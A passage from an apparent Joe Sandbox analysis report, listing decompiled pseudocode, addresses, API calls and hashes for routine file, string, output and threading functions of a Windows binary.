									 *(_t80 - 0x14) = _t71;
									 *((short*)( *((intOrPtr*)(_t80 - 0x18)) + _t71 * 2)) = 0;
									goto L10;
								} else {
									_t55 = _t72;
								}
							}
						}
						L30:
						E00B11E89(_t44,  *((intOrPtr*)(_t80 - 0x18)));
						_t49 = _t55;
					} else {
						_t49 = 0;
					}
				} else {
					_t49 = 1;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t80 - 0xc));
				return _t49;
			}

















                                                                                                                    0x00b15b34
                                                                                                                    0x00b15b3d
                                                                                                                    0x00b15b3f
                                                                                                                    0x00b15b47
                                                                                                                    0x00b15b56
                                                                                                                    0x00b15b5b
                                                                                                                    0x00b15b5d
                                                                                                                    0x00b15b72
                                                                                                                    0x00b15b75
                                                                                                                    0x00b15b7a
                                                                                                                    0x00b15b7f
                                                                                                                    0x00b15b82
                                                                                                                    0x00b15b87
                                                                                                                    0x00b15b89
                                                                                                                    0x00b15bab
                                                                                                                    0x00b15bb2
                                                                                                                    0x00b15bb7
                                                                                                                    0x00b15bba
                                                                                                                    0x00b15bbe
                                                                                                                    0x00b15bbe
                                                                                                                    0x00b15bbe
                                                                                                                    0x00b15bc1
                                                                                                                    0x00b15bc1
                                                                                                                    0x00b15bc6
                                                                                                                    0x00b15bc8
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b15bca
                                                                                                                    0x00b15bd0
                                                                                                                    0x00b15bd5
                                                                                                                    0x00b15bdf
                                                                                                                    0x00b15be1
                                                                                                                    0x00b15be3
                                                                                                                    0x00b15be7
                                                                                                                    0x00b15bea
                                                                                                                    0x00b15bed
                                                                                                                    0x00b15bfe
                                                                                                                    0x00b15bfe
                                                                                                                    0x00b15bfe
                                                                                                                    0x00b15c01
                                                                                                                    0x00b15c03
                                                                                                                    0x00b15c05
                                                                                                                    0x00b15c08
                                                                                                                    0x00000000
                                                                                                                    0x00b15c0a
                                                                                                                    0x00b15c0a
                                                                                                                    0x00b15c0d
                                                                                                                    0x00000000
                                                                                                                    0x00b15c0d
                                                                                                                    0x00000000
                                                                                                                    0x00b15c08
                                                                                                                    0x00b15bef
                                                                                                                    0x00b15bef
                                                                                                                    0x00b15bf2
                                                                                                                    0x00b15bf6
                                                                                                                    0x00b15bf8
                                                                                                                    0x00b15bfc
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b15bfc
                                                                                                                    0x00b15bf6
                                                                                                                    0x00b15bed
                                                                                                                    0x00b15be3
                                                                                                                    0x00b15c4d
                                                                                                                    0x00b15c50
                                                                                                                    0x00000000
                                                                                                                    0x00b15c55
                                                                                                                    0x00b15c13
                                                                                                                    0x00b15c13
                                                                                                                    0x00b15c13
                                                                                                                    0x00b15c16
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b15c1f
                                                                                                                    0x00b15c24
                                                                                                                    0x00b15c26
                                                                                                                    0x00b15c2d
                                                                                                                    0x00b15c28
                                                                                                                    0x00b15c28
                                                                                                                    0x00b15c28
                                                                                                                    0x00b15c38
                                                                                                                    0x00b15c40
                                                                                                                    0x00b15c45
                                                                                                                    0x00b15c47
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b15c49
                                                                                                                    0x00000000
                                                                                                                    0x00b15c47
                                                                                                                    0x00b15c4b
                                                                                                                    0x00000000
                                                                                                                    0x00b15c4b
                                                                                                                    0x00b15b8b
                                                                                                                    0x00b15b8b
                                                                                                                    0x00b15b8e
                                                                                                                    0x00b15b91
                                                                                                                    0x00b15b93
                                                                                                                    0x00000000
                                                                                                                    0x00b15b95
                                                                                                                    0x00b15b95
                                                                                                                    0x00b15b98
                                                                                                                    0x00b15ba4
                                                                                                                    0x00b15ba7
                                                                                                                    0x00000000
                                                                                                                    0x00b15b9a
                                                                                                                    0x00b15b9a
                                                                                                                    0x00b15b9a
                                                                                                                    0x00b15b98
                                                                                                                    0x00b15b93
                                                                                                                    0x00b15c56
                                                                                                                    0x00b15c59
                                                                                                                    0x00b15c5f
                                                                                                                    0x00b15b5f
                                                                                                                    0x00b15b5f
                                                                                                                    0x00b15b5f
                                                                                                                    0x00b15b4d
                                                                                                                    0x00b15b4d
                                                                                                                    0x00b15b4d
                                                                                                                    0x00b15c67
                                                                                                                    0x00b15c6f

                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 00B15B34
                                                                                                                      • Part of subcall function 00B1692E: __EH_prolog.LIBCMT ref: 00B16933
                                                                                                                      • Part of subcall function 00B1692E: GetFileAttributesW.KERNELBASE(?,?,?,00000000,?), ref: 00B16953
                                                                                                                      • Part of subcall function 00B1692E: GetFileAttributesW.KERNELBASE(?,00000000,?,?,00000000,?), ref: 00B16982
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.683592501.0000000000B11000.00000020.00000001.01000000.00000008.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                    • Associated: 0000000D.00000002.683584765.0000000000B10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683731985.0000000000B89000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683757045.0000000000B9A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683775176.0000000000BA2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_b10000_7g.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AttributesFileH_prolog
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3244726999-0
                                                                                                                    • Opcode ID: 1c2b7c413e5c338f080c3159951d34338d2b35cd2fdbfb99ae679a54e440848b
                                                                                                                    • Instruction ID: 3c5c97911a30a29a7751a256bfa974a57328d92f17ad3eca6d54e21016b7691a
                                                                                                                    • Opcode Fuzzy Hash: 1c2b7c413e5c338f080c3159951d34338d2b35cd2fdbfb99ae679a54e440848b
                                                                                                                    • Instruction Fuzzy Hash: 3C315B31904A1ACACF38AF94C5819FEB7F5EF95304F9004E9D901B7151EB216EC68BD1
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00B3683E Relevance: 3.1, APIs: 2, Instructions: 84COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 94%
                                                                                                                    			E00B3683E(void* __ecx, void* __eflags) {
				void* __ebx;
				void* _t47;
				void* _t54;
				signed int _t59;
				char _t61;
				void* _t87;
				signed int _t89;
				void* _t91;

				L00B7F140(0xb85060, _t91);
				 *((intOrPtr*)(_t91 - 0x18)) = 0;
				 *((intOrPtr*)(_t91 - 0x14)) = 0;
				 *((intOrPtr*)(_t91 - 0x10)) = 0;
				 *(_t91 - 4) = 0;
				 *((intOrPtr*)(_t91 - 0x24)) = 0;
				 *((intOrPtr*)(_t91 - 0x20)) = 0;
				 *((intOrPtr*)(_t91 - 0x1c)) = 0;
				 *(_t91 - 4) = 1;
				E00B135A7( *((intOrPtr*)(_t91 + 8)), _t91 - 0x18, __eflags); // executed
				E00B135A7( *((intOrPtr*)(_t91 + 0xc)), _t91 - 0x24, __eflags);
				_t89 = 0;
				if( *((intOrPtr*)(_t91 - 0x14)) <= 0) {
					L6:
					 *(_t91 - 4) = 0;
					L00B41B84(0, _t91 - 0x24);
					 *(_t91 - 4) =  *(_t91 - 4) | 0xffffffff;
					_t47 = L00B41B84(0, _t91 - 0x18);
					 *[fs:0x0] =  *((intOrPtr*)(_t91 - 0xc));
					return _t47;
				}
				_t87 = __ecx + 0x1c;
				do {
					E00B12D90(_t91 - 0x3c);
					 *(_t91 - 4) = 2;
					E00B12D90(_t91 - 0x30);
					 *(_t91 - 4) = 3;
					L00B12F78(_t91 - 0x3c,  *((intOrPtr*)( *((intOrPtr*)(_t91 - 0x18)) + _t89 * 4)));
					if(_t89 <  *((intOrPtr*)(_t91 - 0x20))) {
						L00B12F78(_t91 - 0x30,  *((intOrPtr*)( *((intOrPtr*)(_t91 - 0x24)) + _t89 * 4)));
						_t59 = wcscmp( *(_t91 - 0x30), 0xb89388);
						asm("sbb al, al");
						_t61 =  ~_t59 + 1;
						 *((char*)(_t91 + 0xb)) = _t61;
						if(_t61 != 0) {
							 *((intOrPtr*)(_t91 - 0x2c)) = 0;
							 *( *(_t91 - 0x30)) = 0;
						}
					}
					E00B56B33(_t87);
					_push(_t91 - 0x3c);
					_t54 = E00B3673F(0, _t87);
					 *(_t91 - 4) = 1;
					E00B11E89(E00B11E89(_t54,  *(_t91 - 0x30)),  *((intOrPtr*)(_t91 - 0x3c)));
					_t89 = _t89 + 1;
				} while (_t89 <  *((intOrPtr*)(_t91 - 0x14)));
				goto L6;
			}











                                                                                                                    0x00b36843
                                                                                                                    0x00b36852
                                                                                                                    0x00b36855
                                                                                                                    0x00b36858
                                                                                                                    0x00b3685b
                                                                                                                    0x00b3685e
                                                                                                                    0x00b36861
                                                                                                                    0x00b36864
                                                                                                                    0x00b3686d
                                                                                                                    0x00b36871
                                                                                                                    0x00b3687c
                                                                                                                    0x00b36881
                                                                                                                    0x00b36886
                                                                                                                    0x00b3691e
                                                                                                                    0x00b36921
                                                                                                                    0x00b36924
                                                                                                                    0x00b36929
                                                                                                                    0x00b36930
                                                                                                                    0x00b3693b
                                                                                                                    0x00b36943
                                                                                                                    0x00b36943
                                                                                                                    0x00b3688c
                                                                                                                    0x00b3688f
                                                                                                                    0x00b36892
                                                                                                                    0x00b3689a
                                                                                                                    0x00b3689e
                                                                                                                    0x00b368a9
                                                                                                                    0x00b368b0
                                                                                                                    0x00b368b8
                                                                                                                    0x00b368c3
                                                                                                                    0x00b368d0
                                                                                                                    0x00b368d8
                                                                                                                    0x00b368db
                                                                                                                    0x00b368de
                                                                                                                    0x00b368e1
                                                                                                                    0x00b368e6
                                                                                                                    0x00b368e9
                                                                                                                    0x00b368e9
                                                                                                                    0x00b368e1
                                                                                                                    0x00b368ee
                                                                                                                    0x00b368f8
                                                                                                                    0x00b368f9
                                                                                                                    0x00b36901
                                                                                                                    0x00b3690d
                                                                                                                    0x00b36912
                                                                                                                    0x00b36917
                                                                                                                    0x00000000

                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 00B36843
                                                                                                                      • Part of subcall function 00B135A7: __EH_prolog.LIBCMT ref: 00B135AC
                                                                                                                    • wcscmp.MSVCRT ref: 00B368D0
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.683592501.0000000000B11000.00000020.00000001.01000000.00000008.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                    • Associated: 0000000D.00000002.683584765.0000000000B10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683731985.0000000000B89000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683757045.0000000000B9A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683775176.0000000000BA2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_b10000_7g.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: H_prolog$wcscmp
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3232955128-0
                                                                                                                    • Opcode ID: 9982930fddf5b3f4b05b9b2f266df866bed58624b78a944c18b2a54adb0ac870
                                                                                                                    • Instruction ID: 81654753ec5ad2dee97997be77adcc6b0fa59faf8c38c36293162eb8554e9cce
                                                                                                                    • Opcode Fuzzy Hash: 9982930fddf5b3f4b05b9b2f266df866bed58624b78a944c18b2a54adb0ac870
                                                                                                                    • Instruction Fuzzy Hash: CA311631D01259EACF05EFE8D4829EDFBB5BF58304FA081AAE415B32A1DB305A45DB61
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00B5D45B Relevance: 3.0, APIs: 2, Instructions: 39COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 51%
                                                                                                                    			E00B5D45B(void* __ecx) {
				void* _t19;
				intOrPtr _t29;
				void* _t34;
				intOrPtr _t36;

				L00B7F140(0xb87944, _t34);
				_push(__ecx);
				_push(__ecx);
				_t29 =  *((intOrPtr*)(_t34 + 8));
				 *((intOrPtr*)(_t34 - 0x10)) = _t36;
				_push( *((intOrPtr*)(_t34 + 0x18)));
				 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
				_push( *((intOrPtr*)(_t34 + 0x14)));
				_push( *((intOrPtr*)(_t34 + 0x10)));
				_push( *((intOrPtr*)(_t34 + 0xc)));
				_push(_t29); // executed
				_t19 = E00B5D01D(__ecx); // executed
				if( *((char*)(__ecx + 0x3c)) != 0) {
					 *((char*)(_t29 + 0x14a)) = 1;
				}
				if(_t19 != 0x80004001) {
					 *[fs:0x0] =  *((intOrPtr*)(_t34 - 0xc));
					return _t19;
				} else {
					_push(0xb98128);
					 *((char*)(_t34 - 0x11)) =  *((intOrPtr*)(_t34 + 0xb));
					_push(_t34 - 0x11);
					L00B7F160();
					 *((char*)( *((intOrPtr*)(_t34 + 8)) + 0x14e)) = 1;
					return 0xb5d4d0;
				}
			}







                                                                                                                    0x00b5d460
                                                                                                                    0x00b5d465
                                                                                                                    0x00b5d466
                                                                                                                    0x00b5d46a
                                                                                                                    0x00b5d46d
                                                                                                                    0x00b5d470
                                                                                                                    0x00b5d473
                                                                                                                    0x00b5d479
                                                                                                                    0x00b5d47c
                                                                                                                    0x00b5d47f
                                                                                                                    0x00b5d482
                                                                                                                    0x00b5d483
                                                                                                                    0x00b5d48c
                                                                                                                    0x00b5d48e
                                                                                                                    0x00b5d48e
                                                                                                                    0x00b5d49a
                                                                                                                    0x00b5d4d8
                                                                                                                    0x00b5d4e1
                                                                                                                    0x00b5d49c
                                                                                                                    0x00b5d49f
                                                                                                                    0x00b5d4a4
                                                                                                                    0x00b5d4aa
                                                                                                                    0x00b5d4ab
                                                                                                                    0x00b5d4b3
                                                                                                                    0x00b5d4bf
                                                                                                                    0x00b5d4bf

                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 00B5D460
                                                                                                                      • Part of subcall function 00B5D01D: __EH_prolog.LIBCMT ref: 00B5D022
                                                                                                                    • _CxxThrowException.MSVCRT(?,00B98128), ref: 00B5D4AB
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.683592501.0000000000B11000.00000020.00000001.01000000.00000008.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                    • Associated: 0000000D.00000002.683584765.0000000000B10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683731985.0000000000B89000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683757045.0000000000B9A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683775176.0000000000BA2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_b10000_7g.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: H_prolog$ExceptionThrow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2366012087-0
                                                                                                                    • Opcode ID: 957e64491ba74a91e1b7342bdb3c775e3193c4357f0a18fe89857aab7cad9fb0
                                                                                                                    • Instruction ID: dee15d078cc5ea1981ef3c04dc5db07662ca16af642940178053f1ed1745322c
                                                                                                                    • Opcode Fuzzy Hash: 957e64491ba74a91e1b7342bdb3c775e3193c4357f0a18fe89857aab7cad9fb0
                                                                                                                    • Instruction Fuzzy Hash: 6901A232504249BFEF119F94C805BEE7FE4EB45314F0441DAF8046B211C7B5A954DBA1
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00B445E7 Relevance: 3.0, APIs: 2, Instructions: 29COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 100%
                                                                                                                    			E00B445E7(void* __ecx) {
				void* _t12;
				void* _t27;
				void* _t30;

				_t12 = L00B7F140(0xb85f44, _t30);
				_t27 = __ecx;
				if( *((intOrPtr*)(__ecx + 4)) != 0) {
					E00B126D9(_t30 - 0x18);
					 *(_t30 - 4) =  *(_t30 - 4) & 0x00000000;
					E00B44464(_t30 - 0x18,  *((intOrPtr*)(_t30 + 8)));
					fputs( *(_t30 - 0x18),  *( *(_t27 + 4))); // executed
					_t12 = E00B11E89(E00B11FE9( *(_t27 + 4)),  *(_t30 - 0x18));
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t30 - 0xc));
				return _t12;
			}






                                                                                                                    0x00b445ec
                                                                                                                    0x00b445f5
                                                                                                                    0x00b445fb
                                                                                                                    0x00b44600
                                                                                                                    0x00b44608
                                                                                                                    0x00b4460f
                                                                                                                    0x00b4461c
                                                                                                                    0x00b4462e
                                                                                                                    0x00b44633
                                                                                                                    0x00b44638
                                                                                                                    0x00b44640

                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 00B445EC
                                                                                                                    • fputs.MSVCRT ref: 00B4461C
                                                                                                                      • Part of subcall function 00B11FE9: fputc.MSVCRT ref: 00B11FF0
                                                                                                                      • Part of subcall function 00B11E89: free.MSVCRT(?,00B36CD6,00000000,00000000,00000001,?,00B110EB), ref: 00B11E8D
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.683592501.0000000000B11000.00000020.00000001.01000000.00000008.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                    • Associated: 0000000D.00000002.683584765.0000000000B10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683731985.0000000000B89000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683757045.0000000000B9A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683775176.0000000000BA2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_b10000_7g.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: H_prologfputcfputsfree
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 195749403-0
                                                                                                                    • Opcode ID: 9b59e0745205c70e68e0b2e094b047acb0714585fc36280dc5d554fba6048da6
                                                                                                                    • Instruction ID: cd5b83b2ca14583a5d1cad2e298b5cd72e60ca181f8df4391625f1ef8d39a3b2
                                                                                                                    • Opcode Fuzzy Hash: 9b59e0745205c70e68e0b2e094b047acb0714585fc36280dc5d554fba6048da6
                                                                                                                    • Instruction Fuzzy Hash: A2F05E32800105DBCB15FB98E4067EEBBF5EF44710F1080AAE502675E1DF345995DB84
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00B4A3E5 Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 100%
                                                                                                                    			E00B4A3E5(struct _IO_FILE** __ecx, void* __edx) {
				void* _t1;
				void* _t4;
				struct _IO_FILE** _t13;

				_t13 = __ecx;
				_t4 = __edx;
				if(__ecx != 0) {
					fputs( *0xb8d3d0,  *__ecx); // executed
					_t1 = E00B11FE9(_t13);
					if(_t4 != 0) {
						return fputs( *0xb8d3d4,  *_t13);
					}
				}
				return _t1;
			}






                                                                                                                    0x00b4a3e7
                                                                                                                    0x00b4a3ec
                                                                                                                    0x00b4a3ee
                                                                                                                    0x00b4a3fe
                                                                                                                    0x00b4a404
                                                                                                                    0x00b4a40b
                                                                                                                    0x00000000
                                                                                                                    0x00b4a418
                                                                                                                    0x00b4a40b
                                                                                                                    0x00b4a41c

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.683592501.0000000000B11000.00000020.00000001.01000000.00000008.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                    • Associated: 0000000D.00000002.683584765.0000000000B10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683731985.0000000000B89000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683757045.0000000000B9A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683775176.0000000000BA2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_b10000_7g.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: fputs$fputc
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1185151155-0
                                                                                                                    • Opcode ID: 7f1de993f30b08a3fd79ae35e592f77b1748d6bcb96617816e0265bca138b1e5
                                                                                                                    • Instruction ID: a817e59f4bb5b397106a68d0344f1b9ad06443c2c9d9dacdda18b327c1493fe2
                                                                                                                    • Opcode Fuzzy Hash: 7f1de993f30b08a3fd79ae35e592f77b1748d6bcb96617816e0265bca138b1e5
                                                                                                                    • Instruction Fuzzy Hash: BAE0CD372491106E96152748BC06C6837D5DBC5661329007FF540933F15FA31C15AFE5
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00B77E10 Relevance: 3.0, APIs: 2, Instructions: 23COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 55%
                                                                                                                    			E00B77E10(intOrPtr* __ecx, void* __edx, char _a4) {
				char* _t3;
				long _t4;

				_t3 =  &_a4;
				_push(_t3);
				_push(0);
				_push(_a4);
				_push(0);
				_push(0); // executed
				L00B7F53A(); // executed
				 *__ecx = _t3;
				if(_t3 == 0) {
					_t4 = GetLastError();
					if(_t4 == 0) {
						return 1;
					}
					return _t4;
				} else {
					return 0;
				}
			}





                                                                                                                    0x00b77e11
                                                                                                                    0x00b77e15
                                                                                                                    0x00b77e16
                                                                                                                    0x00b77e1e
                                                                                                                    0x00b77e20
                                                                                                                    0x00b77e22
                                                                                                                    0x00b77e24
                                                                                                                    0x00b77e2c
                                                                                                                    0x00b77e31
                                                                                                                    0x00b77e38
                                                                                                                    0x00b77e40
                                                                                                                    0x00000000
                                                                                                                    0x00b77e42
                                                                                                                    0x00b77e47
                                                                                                                    0x00b77e33
                                                                                                                    0x00b77e35
                                                                                                                    0x00b77e35

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.683592501.0000000000B11000.00000020.00000001.01000000.00000008.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                    • Associated: 0000000D.00000002.683584765.0000000000B10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683731985.0000000000B89000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683757045.0000000000B9A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683775176.0000000000BA2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_b10000_7g.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorLast_beginthreadex
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4034172046-0
                                                                                                                    • Opcode ID: aa2d441f322997788cfbe124530a7e3f103b8e931a5a1ac43dce13ecbd80a087
                                                                                                                    • Instruction ID: ad2672adbbf1ee0c8361129240801eb5077c98082b43946bda89948828f9f763
                                                                                                                    • Opcode Fuzzy Hash: aa2d441f322997788cfbe124530a7e3f103b8e931a5a1ac43dce13ecbd80a087
                                                                                                                    • Instruction Fuzzy Hash: 6FE08CB22482026BE3109A649C01FB762DCDBA0B00F0484BDBA48C6180EA608C00C7B5
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00B19810 Relevance: 3.0, APIs: 2, Instructions: 7COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 100%
                                                                                                                    			E00B19810(DWORD* __ecx) {
				int _t4;

				_t4 = GetProcessAffinityMask(GetCurrentProcess(), __ecx,  &(__ecx[1])); // executed
				return _t4;
			}




                                                                                                                    0x00b1981c
                                                                                                                    0x00b19822

                                                                                                                    APIs
                                                                                                                    • GetCurrentProcess.KERNEL32(?,?,00B19831), ref: 00B19815
                                                                                                                    • GetProcessAffinityMask.KERNEL32(00000000), ref: 00B1981C
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.683592501.0000000000B11000.00000020.00000001.01000000.00000008.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                    • Associated: 0000000D.00000002.683584765.0000000000B10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683731985.0000000000B89000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683757045.0000000000B9A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683775176.0000000000BA2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_b10000_7g.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Process$AffinityCurrentMask
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1231390398-0
                                                                                                                    • Opcode ID: 3640f801e7a5a4602ba52909a727a8f9195e485fd3740a2dab4efbf0921e2d30
                                                                                                                    • Instruction ID: a14cc1d8b22b949872e66c0f112a266f490dc7d97662b91f70fc8907a287185a
                                                                                                                    • Opcode Fuzzy Hash: 3640f801e7a5a4602ba52909a727a8f9195e485fd3740a2dab4efbf0921e2d30
                                                                                                                    • Instruction Fuzzy Hash: CBB012B1400100FFCF009BB0DD0CCB63B2DEA053053084445F909C7030CE3AC045DB20
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00B1AEFF Relevance: 2.7, APIs: 2, Instructions: 222COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 81%
                                                                                                                    			E00B1AEFF(char _a4, signed int _a8, int _a12, signed int _a16) {
				signed int _v8;
				intOrPtr _v16;
				signed int _v20;
				signed int _v24;
				signed int* _t84;
				signed int _t85;
				signed int _t87;
				signed int _t89;
				signed int _t93;
				signed int _t97;
				signed int _t98;
				signed int _t99;
				signed int _t101;
				signed int _t106;
				signed int _t107;
				signed int _t108;
				signed int _t110;
				signed int _t112;
				intOrPtr _t113;
				int _t114;
				signed int* _t117;
				signed int _t120;
				intOrPtr _t123;
				signed int _t124;
				signed int _t125;
				signed int _t131;
				long _t132;
				intOrPtr _t134;
				signed int _t135;
				signed int _t136;
				signed int _t139;
				signed int _t141;
				signed int _t145;
				signed int _t149;
				signed int _t150;
				int _t151;
				intOrPtr _t152;
				char _t155;
				void* _t163;

				_t84 = _a16;
				if(_t84 != 0) {
					 *_t84 =  *_t84 & 0x00000000;
				}
				if(_a12 == 0) {
					L10:
					_t85 = 0;
					L59:
					return _t85;
				}
				_t155 = _a4;
				if( *((char*)(_t155 + 0x1d)) == 0) {
					L49:
					_t87 = E00B1789B(_a8, _a12,  &_a4); // executed
					_t141 = _a16;
					_t123 = _a4;
					__eflags = _t141;
					if(_t141 != 0) {
						 *_t141 = _t123;
					}
					 *(_t155 + 0x28) =  *(_t155 + 0x28) + _t123;
					asm("adc [esi+0x2c], edx");
					 *(_t155 + 0x30) =  *(_t155 + 0x30) + _t123;
					asm("adc [esi+0x34], edx");
					__eflags = _t87;
					if(_t87 != 0) {
						goto L10;
					} else {
						_t85 = GetLastError();
						_t124 =  *(_t155 + 0x80);
						__eflags = _t124;
						if(_t124 == 0) {
							__eflags = _t85;
							if(__eflags != 0) {
								if(__eflags > 0) {
									_t85 = _t85 & 0x0000ffff | 0x80070000;
									__eflags = _t85;
								}
								goto L59;
							}
							L56:
							_t85 = 0x80004005;
							goto L59;
						}
						_t85 =  *((intOrPtr*)( *_t124))( *((intOrPtr*)(_t155 + 0x84)), _t85);
						goto L59;
					}
				}
				if( *((char*)(_t155 + 0x1e)) == 0) {
					L15:
					_t117 = _t155 + 0x44;
					while(1) {
						_t89 =  *(_t155 + 0x28);
						_t125 =  *((intOrPtr*)(_t155 + 0x2c));
						_v8 = _t125;
						_t149 = _t89 & 0xfffc0000;
						__eflags =  *_t117;
						if( *_t117 <= 0) {
							goto L19;
						}
						_t140 =  *(_t155 + 0x38);
						__eflags =  *(_t155 + 0x38) - _t149;
						if( *(_t155 + 0x38) != _t149) {
							goto L19;
						}
						_t140 =  *(_t155 + 0x3c);
						__eflags =  *(_t155 + 0x3c) - _t125;
						if( *(_t155 + 0x3c) == _t125) {
							_t120 =  *_t117;
							_t110 =  *(_t155 + 0x28) & 0x0003ffff;
							__eflags = _t110 - _t120;
							if(_t110 < _t120) {
								_t151 = _t120 - _t110;
								__eflags = _t151 - _a12;
								if(_t151 >= _a12) {
									_t151 = _a12;
								}
								memcpy(_a8,  *(_t155 + 0x40) + _t110, _t151);
								_t112 = _a16;
								 *(_t155 + 0x28) =  *(_t155 + 0x28) + _t151;
								asm("adc dword [esi+0x2c], 0x0");
								__eflags = _t112;
								if(_t112 != 0) {
									 *_t112 =  *_t112 + _t151;
								}
							}
							goto L10;
						}
						L19:
						__eflags = _t89 & 0x0003ffff;
